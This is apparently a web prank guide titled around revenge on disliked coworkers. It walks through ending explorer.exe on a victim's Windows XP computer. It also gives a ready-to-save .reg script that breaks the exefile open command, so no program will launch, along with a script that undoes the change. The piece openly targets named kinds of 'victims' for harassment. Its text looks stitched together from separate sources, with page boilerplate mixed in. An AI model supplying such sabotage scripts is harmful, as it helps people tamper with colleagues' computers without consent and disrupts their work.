But let's stick to the workplace.
All of you may have come across some nasty personalities at your job.
it is either a:
evil boss ::::: a**kissing servants :::: rude secretary :::: or sometimes all 3 combined.
So, this are the kind of victims that deserve it.
IT'S TIME FOR REVENGE, the prank that will let them know they are not liked at all >:)
Remember, watch your timing and be quick. Do some practice first, test how fast you can operate it.
(!): I saw after publishing a similar instructable about this, yet I took this prank to another level, it's more about confusing, not making the victims believe they computer totally froze up. They won't suspect it is prank. Read the end of the instructable also, please.
Remove these ads by
Signing UpStep 1Vulnerable
They just click, double click, drag, right click, click again.
What if they couldn't click any more, but still can? This is as confusing as it gets :D
One typical Windows XP desktop, ready to be hijacked :D
| « Previous Step | Download PDFView All Steps | Next Step » |
















































Ctrl+Alt+Del= Task manager. Click "Processes" tab and then press "E" on the keyboard until you find "explorer.exe", right click it and select "End Process", click "OK"
This will remove the ability of being able to right click or do anything a "normal" user would want to be able to do.
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%COMPUTERNAME%\" %*"
save the file as whatever.reg. Make sure the file isnt whatever.reg.txt, because then it wont work, itll just open in notepad. If all went well you have a registry script that will make all executable files open with the open with dialog!
Make another reg script with the %computername% replaced with %1%, which is the default behavior, so if you need to correct the change you can run the second one to put it back!